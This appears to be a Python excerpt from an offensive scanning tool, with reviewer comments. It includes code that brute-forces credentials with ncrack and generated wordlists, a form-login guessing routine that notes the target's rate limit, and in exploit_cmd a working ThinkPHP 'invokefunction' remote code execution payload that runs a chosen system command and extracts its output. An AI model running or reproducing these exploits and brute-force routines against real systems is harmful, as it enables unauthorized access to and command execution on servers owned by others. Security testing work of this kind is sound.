def send_encrypt(self, data):
    """Send ``data`` as the value of the configured cookie and return the server's reply cookie.

    Args:
        data: Already-prepared cookie value; it is placed verbatim into the
            ``Cookie`` header under ``self._cookie_name``.

    Returns:
        The ``Set-Cookie`` response header from the request, or ``""`` when the
        response carries none.

    Note:
        Reads ``self.target`` and ``self._cookie_name``; issues one HTTP request
        through the project helper ``http_req``.
    """
    url = self.target + "/"
    # A random key=value query string is appended to every request;
    # presumably this is meant to defeat caching — confirm against the helper.
    url = url + "?" + random_choices() + "=" + random_choices()
    headers = {"Cookie": '{}={}'.format(self._cookie_name, data)}
    # NOTE(review): timeout and TLS-verification behaviour live inside
    # http_req and are not visible here — verify they are set there.
    set_cookie = http_req(url, headers=headers).headers.get('Set-Cookie', "")
    return set_cookie
def _crack_user_pass(self):
    """Run ncrack against ``self.target`` with the generated wordlists and parse one hit.

    Calls ``self._gen_user_pass_file()`` first, so it relies on the attributes
    that method sets (``gen_user_file``, ``gen_pass_file``, ``debug_lever``,
    ``max_connection_limit``, ``connection_delay``, ``timeout``).

    Returns:
        ``{"username": ..., "password": ...}`` for the first line of the ncrack
        output that matches the "Discovered credentials on" pattern; implicitly
        ``None`` when nothing matched or no output file was produced.

    Side effects:
        Writes an ncrack output file under ``Conf.TEMP_DIR`` and deletes it
        together with the generated wordlists (see cleanup note below).
    """
    self._gen_user_pass_file()
    random_out_file = os.path.join(Conf.TEMP_DIR, random_choices(6) + ".out.txt")
    # NOTE(review): several elements embed literal single quotes or fuse a flag
    # with its value ("-U '<path>'"). That only works if exec_system joins the
    # list into a shell command line; if it passes the list straight to
    # subprocess, ncrack receives the quotes as part of the path — confirm.
    # If it IS shell-joined, self.target ends up in a shell string, so the
    # caller must make sure target is validated before it reaches here.
    cmd = [
        "ncrack",
        "-oN", "'{}'".format(random_out_file),
        "-f",
        "-d{}".format(self.debug_lever),
        "-v",
        # cd= and to= are milliseconds, as the format string shows.
        "-g cl=1,CL={},at=1,cd={}ms,cr=5,to={}ms".format(
            self.max_connection_limit, self.connection_delay, self.timeout),
        "--pairwise",
        "-U '{}'".format(self.gen_user_file),
        "-P '{}'".format(self.gen_pass_file),
        self.target
    ]
    exec_system(cmd)
    lines = load_file(random_out_file)
    # NOTE(review): the original indentation of this cleanup was lost in the
    # collapsed source; as reconstructed, the wordlists are only removed when
    # ncrack produced an output file, so a failed or interrupted run leaves
    # plaintext wordlists in TEMP_DIR. A try/finally around exec_system that
    # always unlinks all three files would be the safer shape — confirm intent.
    if os.path.exists(random_out_file):
        os.unlink(random_out_file)
        os.unlink(self.gen_pass_file)
        os.unlink(self.gen_user_file)
    for line in lines:
        if "credentials on" not in line:
            continue
        # Pattern is rebuilt on every candidate line; hoisting it (or
        # re.compile) would be a small tidy-up, behaviour is unchanged.
        pattern = r"Discovered\s+credentials\s+on\s+([^\s]+)\s+'([^\']+)'\s+'([^\']+)'"
        matches = re.findall(pattern, line)
        if matches:
            # Group 0 is the service/host token; groups 1 and 2 are the pair.
            item = {"username": matches[0][1], "password": matches[0][2]}
            return item
def _gen_user_pass_file(self):
    """Write the user/password wordlists to temp files and set ncrack tuning attributes.

    Reads ``self.load_dict()``, ``self.delay_scheme`` and ``self.scheme``.

    Sets on ``self``:
        gen_user_file, gen_pass_file: paths of the two files written here.
        debug_lever: 7 when the logger is at DEBUG or below, else 0.
        max_connection_limit, connection_delay, timeout: ncrack ``-g`` values;
            delay and timeout are in milliseconds (they are formatted with a
            ``ms`` suffix by the caller).

    Returns:
        None.
    """
    user_list, pass_list = self.load_dict()
    self.logger.info("load auth pair {}".format(len(user_list)))
    # Both files share one random stem so they are easy to correlate and clean up.
    random_str = random_choices(6)
    random_user_file = os.path.join(Conf.TEMP_DIR, random_str + ".user.txt")
    random_pass_file = os.path.join(Conf.TEMP_DIR, random_str + ".pass.txt")
    # NOTE(review): append_file presumably appends rather than truncates; the
    # random stem makes a collision with a stale file unlikely but not
    # impossible — confirm the helper's behaviour. These files hold plaintext
    # candidate secrets, so TEMP_DIR permissions matter and removal is the
    # caller's responsibility.
    append_file(random_user_file, user_list)
    append_file(random_pass_file, pass_list)
    self.gen_user_file = random_user_file
    self.gen_pass_file = random_pass_file
    self.debug_lever = 0
    if Conf.LOGGER_LEVEL <= logging.DEBUG:
        self.debug_lever = 7
    self.max_connection_limit = 15
    self.connection_delay = 100
    self.timeout = 10 * 60 * 1000  # 10 minutes, in ms
    # Schemes listed in delay_scheme get a slower, longer-running profile.
    for scheme in self.delay_scheme:
        if scheme in self.scheme:
            self.connection_delay = 1500
            self.timeout = 20 * 60 * 1000  # 20 minutes, in ms
            # This `continue` is the last statement of the loop body and has
            # no effect; it could be dropped without changing behaviour.
            continue
def login(self, target, user, passwd):
    """Attempt a form login against ``target + "/login.jsp"`` and report success.

    Args:
        target: Base URL of the application.
        user: Username to submit.
        passwd: Password to submit.

    Returns:
        ``True`` when the response is a 301/302 whose ``Location`` contains the
        random redirect page we asked for; ``False`` when ``Location`` does not
        contain it. Note that a matching ``Location`` with any other status
        code falls through and returns ``None`` — callers testing
        ``is False`` should be aware of this third outcome.
    """
    # Only 10 attempts are allowed within 15 minutes.
    url = target + "/login.jsp"
    csrf = random_choices(10)
    # The redirect target is random per call so that a successful login can
    # be recognised by seeing it echoed back in the Location header.
    location_url = random_choices(6) + ".jsp"
    headers = {"Cookie": "csrf={}".format(csrf)}
    data = {
        "url": "/{}".format(location_url),
        "login": "******",
        "csrf": csrf,
        "username": user,
        "password": passwd
    }
    conn = http_req(url, "post", headers=headers, data=data)
    location = conn.headers.get("Location", "")
    if location_url not in location:
        return False
    if conn.status_code == 301 or conn.status_code == 302:
        return True
def exploit_cmd(self, target, cmd):
    """Check whether ``target`` runs ``cmd`` via the ``invokefunction`` request and print the output.

    The request path looks like a ThinkPHP ``\\think\\app/invokefunction`` call
    (inferred from the payload; not otherwise visible here). ``cmd`` is wrapped
    between two echoes of a random marker so that its output can be located in
    the response body regardless of surrounding page content.

    Args:
        target: Base URL of the application.
        cmd: Command string to be executed by the remote side.

    Returns:
        ``True`` on the first path whose response contains the marker-delimited
        output; implicitly ``None`` when neither path does.

    Side effects:
        Logs via ``self.logger`` and prints the captured output to stdout.
    """
    random_str = random_choices(4)
    payload = "?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]={cmd}"
    tpl = "echo {}&&{}&&echo {}".format(random_str, cmd, random_str)
    paths = ["/", "/public/"]
    self.logger.info("verify {}".format(target))
    # Non-greedy match between the two markers; applied to bytes below.
    reg = r"{}\s([\s\S]+?)\s{}".format(random_str, random_str)
    for path in paths:
        url = target + path + payload.format(cmd=urllib.parse.quote(tpl))
        conn = http_req(url)
        if random_str.encode() in conn.content:
            results = re.findall(reg.encode(), conn.content)
            if results:
                self.logger.success("exploit success, result:")
                # NOTE(review): .decode() assumes UTF-8 output; non-UTF-8 bytes
                # raise UnicodeDecodeError here — consider errors="replace".
                print(results[0].decode())
                return True